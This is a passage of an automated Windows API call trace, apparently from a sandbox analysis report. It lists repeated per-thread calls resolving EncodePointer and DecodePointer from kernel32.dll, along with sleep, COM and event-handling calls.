lpsz="kernel32.dll") returned 0xc [0136.565] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0136.568] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0136.568] SysReAllocStringLen (in: pbstr=0x761fad4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x761fad4*="KERNEL32.DLL") returned 1 [0136.568] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0136.569] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0136.571] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0136.571] SysReAllocStringLen (in: pbstr=0x761fab0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x761fab0*="KERNEL32.DLL") returned 1 [0136.572] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0136.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0136.575] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0136.578] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0136.881] SysReAllocStringLen (in: pbstr=0x761fd88*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x761fd88*="KERNEL32.DLL") returned 1 [0136.881] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0136.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0136.885] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 143 os_tid = 0xa78 [0139.617] SysReAllocStringLen (in: pbstr=0x732f5b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f5b4*="KERNEL32.DLL") returned 1 [0139.617] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0139.618] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0139.621] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0139.622] SysReAllocStringLen (in: pbstr=0x732f5b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f5b4*="KERNEL32.DLL") returned 1 [0139.622] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0139.622] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0139.626] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0139.626] SysReAllocStringLen (in: pbstr=0x732f590*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f590*="KERNEL32.DLL") returned 1 [0139.626] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0139.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0139.631] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0139.634] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0141.540] SysReAllocStringLen (in: pbstr=0x732f868*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f868*="KERNEL32.DLL") returned 1 [0141.541] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0141.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0141.546] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 144 os_tid = 0x330 [0142.275] SysReAllocStringLen (in: pbstr=0x981f54c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x981f54c*="KERNEL32.DLL") returned 1 [0142.275] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0142.276] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0142.282] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0142.284] SysReAllocStringLen (in: pbstr=0x981f54c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x981f54c*="KERNEL32.DLL") returned 1 [0142.284] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0142.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0142.291] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0142.292] SysReAllocStringLen (in: pbstr=0x981f528*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x981f528*="KERNEL32.DLL") returned 1 [0142.292] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0142.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0142.301] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0142.308] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0175.149] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0177.449] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0179.476] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0206.935] CoGetContextToken (in: pToken=0x981f18c | out: pToken=0x981f18c) returned 0x0 [0206.935] IUnknown:QueryInterface (in: This=0x720150, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x981f1b0 | out: ppvObject=0x981f1b0*=0x72015c) returned 0x0 [0206.936] IComThreadingInfo:GetCurrentThreadType (in: This=0x72015c, pThreadType=0x981f1dc | out: pThreadType=0x981f1dc*=0) returned 0x0 [0206.936] IUnknown:Release (This=0x72015c) returned 0x1 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] ResetEvent (hEvent=0xb8) returned 1 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] ResetEvent (hEvent=0xb8) returned 1 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] SetEvent (hEvent=0xbc) returned 1 [0206.936] SetEvent (hEvent=0xb8) returned 1 [0206.936] CloseHandle (hObject=0x29c) returned 1 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] ResetEvent (hEvent=0xb8) returned 1 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] GetCurrentThreadId () returned 0x330 [0206.936] ResetEvent (hEvent=0xb8) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] SetEvent (hEvent=0xbc) returned 1 [0206.937] SetEvent (hEvent=0xb8) returned 1 [0206.937] CloseHandle (hObject=0x204) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] ResetEvent (hEvent=0xb8) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] ResetEvent (hEvent=0xb8) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] SetEvent (hEvent=0xbc) returned 1 [0206.937] SetEvent (hEvent=0xb8) returned 1 [0206.937] CloseHandle (hObject=0x36c) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] ResetEvent (hEvent=0xb8) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] ResetEvent (hEvent=0xb8) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] SetEvent (hEvent=0xbc) returned 1 [0206.937] SetEvent (hEvent=0xb8) returned 1 [0206.937] CloseHandle (hObject=0x378) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.937] ResetEvent (hEvent=0xb8) returned 1 [0206.937] GetCurrentThreadId () returned 0x330 [0206.938] GetCurrentThreadId () returned 0x330 [0206.938] GetCurrentThreadId () returned 0x330 [0206.938] GetCurrentThreadId () returned 0x330 [0206.938] ResetEvent (hEvent=0xb8) returned 1 [0206.938] GetCurrentThreadId () returned 0x330 [0206.938] GetCurrentThreadId () returned 0x330 [0206.938] SetEvent (hEvent=0xbc) returned 1 [0206.938] SetEvent (hEvent=0xb8) returned 1 [0206.938] CloseHandle (hObject=0x4b8) returned 1 [0206.939] SysReAllocStringLen (in: pbstr=0x981f800*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x981f800*="KERNEL32.DLL") returned 1 [0206.939] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.939] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.942] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 145 os_tid = 0x314 [0147.733] SysReAllocStringLen (in: pbstr=0xbeff6ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbeff6ec*="KERNEL32.DLL") returned 1 [0147.733] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.734] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.736] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0147.736] SysReAllocStringLen (in: pbstr=0xbeff6ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbeff6ec*="KERNEL32.DLL") returned 1 [0147.736] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.737] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.740] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0147.740] SysReAllocStringLen (in: pbstr=0xbeff6c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbeff6c8*="KERNEL32.DLL") returned 1 [0147.740] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.743] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0147.746] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0147.949] SysReAllocStringLen (in: pbstr=0xbeff9a0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbeff9a0*="KERNEL32.DLL") returned 1 [0147.949] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.949] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.952] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 146 os_tid = 0x5b4 [0148.254] SysReAllocStringLen (in: pbstr=0x72ef884*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef884*="KERNEL32.DLL") returned 1 [0148.254] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.254] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.257] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.261] SysReAllocStringLen (in: pbstr=0x72ef884*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef884*="KERNEL32.DLL") returned 1 [0148.261] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.270] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.271] SysReAllocStringLen (in: pbstr=0x72ef860*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef860*="KERNEL32.DLL") returned 1 [0148.271] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.405] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.408] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.466] SysReAllocStringLen (in: pbstr=0x72efb38*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72efb38*="KERNEL32.DLL") returned 1 [0148.466] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.469] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 147 os_tid = 0x614 [0148.409] SysReAllocStringLen (in: pbstr=0x952fa2c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x952fa2c*="KERNEL32.DLL") returned 1 [0148.409] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.413] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.414] SysReAllocStringLen (in: pbstr=0x952fa2c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x952fa2c*="KERNEL32.DLL") returned 1 [0148.414] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.414] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.417] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.418] SysReAllocStringLen (in: pbstr=0x952fa08*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x952fa08*="KERNEL32.DLL") returned 1 [0148.418] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.418] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.422] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.425] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.794] SysReAllocStringLen (in: pbstr=0x952fce0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x952fce0*="KERNEL32.DLL") returned 1 [0148.794] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.794] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.798] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 148 os_tid = 0x6cc [0148.426] SysReAllocStringLen (in: pbstr=0xbecf4e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbecf4e4*="KERNEL32.DLL") returned 1 [0148.426] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.431] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.431] SysReAllocStringLen (in: pbstr=0xbecf4e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbecf4e4*="KERNEL32.DLL") returned 1 [0148.431] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.435] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.436] SysReAllocStringLen (in: pbstr=0xbecf4c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbecf4c0*="KERNEL32.DLL") returned 1 [0148.436] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.436] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.440] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.443] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.005] SysReAllocStringLen (in: pbstr=0xbecf798*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbecf798*="KERNEL32.DLL") returned 1 [0149.005] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.010] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 149 os_tid = 0x5f4 [0148.446] SysReAllocStringLen (in: pbstr=0xc0afacc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc0afacc*="KERNEL32.DLL") returned 1 [0148.446] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.446] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.449] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.450] SysReAllocStringLen (in: pbstr=0xc0afacc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc0afacc*="KERNEL32.DLL") returned 1 [0148.450] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.450] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.453] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.454] SysReAllocStringLen (in: pbstr=0xc0afaa8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc0afaa8*="KERNEL32.DLL") returned 1 [0148.454] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.457] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.460] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.223] SysReAllocStringLen (in: pbstr=0xc0afd80*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc0afd80*="KERNEL32.DLL") returned 1 [0149.223] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.224] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.226] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 150 os_tid = 0x344 [0148.517] SysReAllocStringLen (in: pbstr=0x966f7a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x966f7a4*="KERNEL32.DLL") returned 1 [0148.518] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.518] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.521] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.521] SysReAllocStringLen (in: pbstr=0x966f7a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x966f7a4*="KERNEL32.DLL") returned 1 [0148.521] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.524] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.524] SysReAllocStringLen (in: pbstr=0x966f780*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x966f780*="KERNEL32.DLL") returned 1 [0148.524] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.525] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.527] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.530] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.622] SysReAllocStringLen (in: pbstr=0x966fa58*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x966fa58*="KERNEL32.DLL") returned 1 [0149.622] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.622] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.626] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 151 os_tid = 0xa20 [0148.531] SysReAllocStringLen (in: pbstr=0xc30f4dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc30f4dc*="KERNEL32.DLL") returned 1 [0148.531] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.535] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.535] SysReAllocStringLen (in: pbstr=0xc30f4dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc30f4dc*="KERNEL32.DLL") returned 1 [0148.535] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.540] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.541] SysReAllocStringLen (in: pbstr=0xc30f4b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc30f4b8*="KERNEL32.DLL") returned 1 [0148.541] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.544] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.547] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.627] SysReAllocStringLen (in: pbstr=0xc30f790*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc30f790*="KERNEL32.DLL") returned 1 [0149.627] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.631] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 152 os_tid = 0x344 Thread: id = 153 os_tid = 0xa20 Thread: id = 154 os_tid = 0x690 [0151.482] SysReAllocStringLen (in: pbstr=0x959f35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f35c*="KERNEL32.DLL") returned 1 [0151.482] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.486] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.486] SysReAllocStringLen (in: pbstr=0x959f35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f35c*="KERNEL32.DLL") returned 1 [0151.486] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.487] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.489] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.489] SysReAllocStringLen (in: pbstr=0x959f338*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f338*="KERNEL32.DLL") returned 1 [0151.489] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.490] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.492] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0151.495] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.686] SysReAllocStringLen (in: pbstr=0x959f610*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f610*="KERNEL32.DLL") returned 1 [0151.686] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.687] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.690] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 155 os_tid = 0xb70 [0151.599] SysReAllocStringLen (in: pbstr=0xbf2f624*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbf2f624*="KERNEL32.DLL") returned 1 [0151.599] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.599] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.602] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.602] SysReAllocStringLen (in: pbstr=0xbf2f624*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbf2f624*="KERNEL32.DLL") returned 1 [0151.602] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.605] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.606] SysReAllocStringLen (in: pbstr=0xbf2f600*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbf2f600*="KERNEL32.DLL") returned 1 [0151.606] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.609] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0151.612] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.693] SysReAllocStringLen (in: pbstr=0xbf2f8d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbf2f8d8*="KERNEL32.DLL") returned 1 [0151.693] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.694] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.697] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 156 os_tid = 0xb30 [0151.614] SysReAllocStringLen (in: pbstr=0xc10f9d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc10f9d4*="KERNEL32.DLL") returned 1 [0151.614] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.615] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.619] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.619] SysReAllocStringLen (in: pbstr=0xc10f9d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc10f9d4*="KERNEL32.DLL") returned 1 [0151.619] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.620] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.624] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.624] SysReAllocStringLen 